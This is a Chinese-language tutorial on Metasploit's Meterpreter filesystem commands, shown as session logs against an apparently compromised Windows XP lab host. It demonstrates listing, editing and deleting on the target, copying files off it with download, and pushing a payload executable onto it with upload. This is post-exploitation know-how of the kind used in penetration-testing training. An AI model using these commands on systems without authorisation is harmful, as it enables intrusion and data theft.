metasploit的文件系统的命令

1、ls

meterpreter > ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
40777/rwxrwxrwx   0          dir   2013-04-28 05:06:49 -0400  $AVG
100777/rwxrwxrwx  0          fil   2012-03-23 23:55:53 -0400  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2012-03-23 23:55:53 -0400  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:48 -0400  Documents and Settings
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  IO.SYS
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2008-04-14 08:00:00 -0400  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2013-04-28 05:08:25 -0400  Program Files
40777/rwxrwxrwx   0          dir   2013-04-28 09:27:28 -0400  RECYCLER
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:34 -0400  System Volume Information
40777/rwxrwxrwx   0          dir   2013-04-28 08:45:45 -0400  WINDOWS
100777/rwxrwxrwx  131820480  fil   2013-04-28 04:06:33 -0400  avg_free_x86_all_2013.exe
100666/rw-rw-rw-  211        fil   2012-03-23 23:51:49 -0400  boot.ini
100444/r--r--r--  322730     fil   2008-04-14 08:00:00 -0400  bootfont.bin
100444/r--r--r--  257728     fil   2008-04-14 08:00:00 -0400  ntldr
100666/rw-rw-rw-  805306368  fil   2013-04-28 08:45:48 -0400  pagefile.sys
100777/rwxrwxrwx  73802      fil   2013-04-28 09:28:40 -0400  payload1.exe
100666/rw-rw-rw-  17         fil   2013-04-28 09:34:24 -0400  readme.txt
40777/rwxrwxrwx   0          dir   2013-04-28 03:19:27 -0400  ruby

meterpreter > 

2、pwd

meterpreter > pwd
C:\
meterpreter > 

3、cat

meterpreter > cat readme.txt
There is nothing.meterpreter > 

4、edit

meterpreter > edit readme.txt
vi: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /usr/lib/libpython2.6.so.1.0)
vi: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /usr/lib/libpython2.6.so.1.0)

There is nothing.

用法和vi相同，但是不叫vi。

meterpreter > vi readme.txt
[-] Unknown command: vi.

保存后，结果;

"/tmp/meterp20130428-3310-snqagf" 2L, 38C written                                                                                                     
[-] Error running command edit: NoMethodError undefined method `close' for "/tmp/meterp20130428-3310-snqagf":String
meterpreter > cat readme.txt
There is nothing.
There is something.
meterpreter >

5、lpwd

meterpreter > lpwd
/root

6、mkdir

meterpreter > ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
40777/rwxrwxrwx   0          dir   2013-04-28 05:06:49 -0400  $AVG
100777/rwxrwxrwx  0          fil   2012-03-23 23:55:53 -0400  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2012-03-23 23:55:53 -0400  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:48 -0400  Documents and Settings
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  IO.SYS
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2008-04-14 08:00:00 -0400  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2013-04-28 05:08:25 -0400  Program Files
40777/rwxrwxrwx   0          dir   2013-04-28 09:27:28 -0400  RECYCLER
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:34 -0400  System Volume Information
40777/rwxrwxrwx   0          dir   2013-04-28 08:45:45 -0400  WINDOWS
100777/rwxrwxrwx  131820480  fil   2013-04-28 04:06:33 -0400  avg_free_x86_all_2013.exe
100666/rw-rw-rw-  211        fil   2012-03-23 23:51:49 -0400  boot.ini
100444/r--r--r--  322730     fil   2008-04-14 08:00:00 -0400  bootfont.bin
100444/r--r--r--  257728     fil   2008-04-14 08:00:00 -0400  ntldr
100666/rw-rw-rw-  805306368  fil   2013-04-28 08:45:48 -0400  pagefile.sys
100777/rwxrwxrwx  73802      fil   2013-04-28 09:28:40 -0400  payload1.exe
100666/rw-rw-rw-  38         fil   2013-04-28 09:37:16 -0400  readme.txt
40777/rwxrwxrwx   0          dir   2013-04-28 03:19:27 -0400  ruby

meterpreter > mkdir newdir
Creating directory: newdir
meterpreter > ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
40777/rwxrwxrwx   0          dir   2013-04-28 05:06:49 -0400  $AVG
100777/rwxrwxrwx  0          fil   2012-03-23 23:55:53 -0400  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2012-03-23 23:55:53 -0400  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:48 -0400  Documents and Settings
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  IO.SYS
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2008-04-14 08:00:00 -0400  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2013-04-28 05:08:25 -0400  Program Files
40777/rwxrwxrwx   0          dir   2013-04-28 09:27:28 -0400  RECYCLER
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:34 -0400  System Volume Information
40777/rwxrwxrwx   0          dir   2013-04-28 08:45:45 -0400  WINDOWS
100777/rwxrwxrwx  131820480  fil   2013-04-28 04:06:33 -0400  avg_free_x86_all_2013.exe
100666/rw-rw-rw-  211        fil   2012-03-23 23:51:49 -0400  boot.ini
100444/r--r--r--  322730     fil   2008-04-14 08:00:00 -0400  bootfont.bin
40777/rwxrwxrwx   0          dir   2013-04-28 09:42:49 -0400  newdir
100444/r--r--r--  257728     fil   2008-04-14 08:00:00 -0400  ntldr
100666/rw-rw-rw-  805306368  fil   2013-04-28 08:45:48 -0400  pagefile.sys
100777/rwxrwxrwx  73802      fil   2013-04-28 09:28:40 -0400  payload1.exe
100666/rw-rw-rw-  38         fil   2013-04-28 09:37:16 -0400  readme.txt
40777/rwxrwxrwx   0          dir   2013-04-28 03:19:27 -0400  ruby

meterpreter > 

7、rmdir

meterpreter > ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
40777/rwxrwxrwx   0          dir   2013-04-28 05:06:49 -0400  $AVG
100777/rwxrwxrwx  0          fil   2012-03-23 23:55:53 -0400  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2012-03-23 23:55:53 -0400  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:48 -0400  Documents and Settings
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  IO.SYS
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2008-04-14 08:00:00 -0400  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2013-04-28 05:08:25 -0400  Program Files
40777/rwxrwxrwx   0          dir   2013-04-28 09:27:28 -0400  RECYCLER
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:34 -0400  System Volume Information
40777/rwxrwxrwx   0          dir   2013-04-28 08:45:45 -0400  WINDOWS
100777/rwxrwxrwx  131820480  fil   2013-04-28 04:06:33 -0400  avg_free_x86_all_2013.exe
100666/rw-rw-rw-  211        fil   2012-03-23 23:51:49 -0400  boot.ini
100444/r--r--r--  322730     fil   2008-04-14 08:00:00 -0400  bootfont.bin
40777/rwxrwxrwx   0          dir   2013-04-28 09:42:49 -0400  newdir
100444/r--r--r--  257728     fil   2008-04-14 08:00:00 -0400  ntldr
100666/rw-rw-rw-  805306368  fil   2013-04-28 08:45:48 -0400  pagefile.sys
100777/rwxrwxrwx  73802      fil   2013-04-28 09:28:40 -0400  payload1.exe
100666/rw-rw-rw-  38         fil   2013-04-28 09:37:16 -0400  readme.txt
40777/rwxrwxrwx   0          dir   2013-04-28 03:19:27 -0400  ruby

meterpreter > rmdir newdir
Removing directory: newdir
meterpreter > ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
40777/rwxrwxrwx   0          dir   2013-04-28 05:06:49 -0400  $AVG
100777/rwxrwxrwx  0          fil   2012-03-23 23:55:53 -0400  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2012-03-23 23:55:53 -0400  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:48 -0400  Documents and Settings
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  IO.SYS
100444/r--r--r--  0          fil   2012-03-23 23:55:53 -0400  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2008-04-14 08:00:00 -0400  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2013-04-28 05:08:25 -0400  Program Files
40777/rwxrwxrwx   0          dir   2013-04-28 09:27:28 -0400  RECYCLER
40777/rwxrwxrwx   0          dir   2012-03-23 23:59:34 -0400  System Volume Information
40777/rwxrwxrwx   0          dir   2013-04-28 08:45:45 -0400  WINDOWS
100777/rwxrwxrwx  131820480  fil   2013-04-28 04:06:33 -0400  avg_free_x86_all_2013.exe
100666/rw-rw-rw-  211        fil   2012-03-23 23:51:49 -0400  boot.ini
100444/r--r--r--  322730     fil   2008-04-14 08:00:00 -0400  bootfont.bin
100444/r--r--r--  257728     fil   2008-04-14 08:00:00 -0400  ntldr
100666/rw-rw-rw-  805306368  fil   2013-04-28 08:45:48 -0400  pagefile.sys
100777/rwxrwxrwx  73802      fil   2013-04-28 09:28:40 -0400  payload1.exe
100666/rw-rw-rw-  38         fil   2013-04-28 09:37:16 -0400  readme.txt
40777/rwxrwxrwx   0          dir   2013-04-28 03:19:27 -0400  ruby

meterpreter > 

8、download

meterpreter > download readme.txt
[*] downloading: readme.txt -> readme.txt
[*] downloaded : readme.txt -> readme.txt
meterpreter > 

刚才看到是在/root目录，所以，文件会下载到/root目录

或者：

meterpreter > download c:\\readme.txt /tmp/
[*] downloading: c:\readme.txt -> /tmp//readme.txt
[*] downloaded : c:\readme.txt -> /tmp//readme.txt
meterpreter > 

9、upload

meterpreter > upload payload1.exe 
[*] uploading  : payload1.exe -> payload1.exe
[*] uploaded   : payload1.exe -> payload1.exe
meterpreter >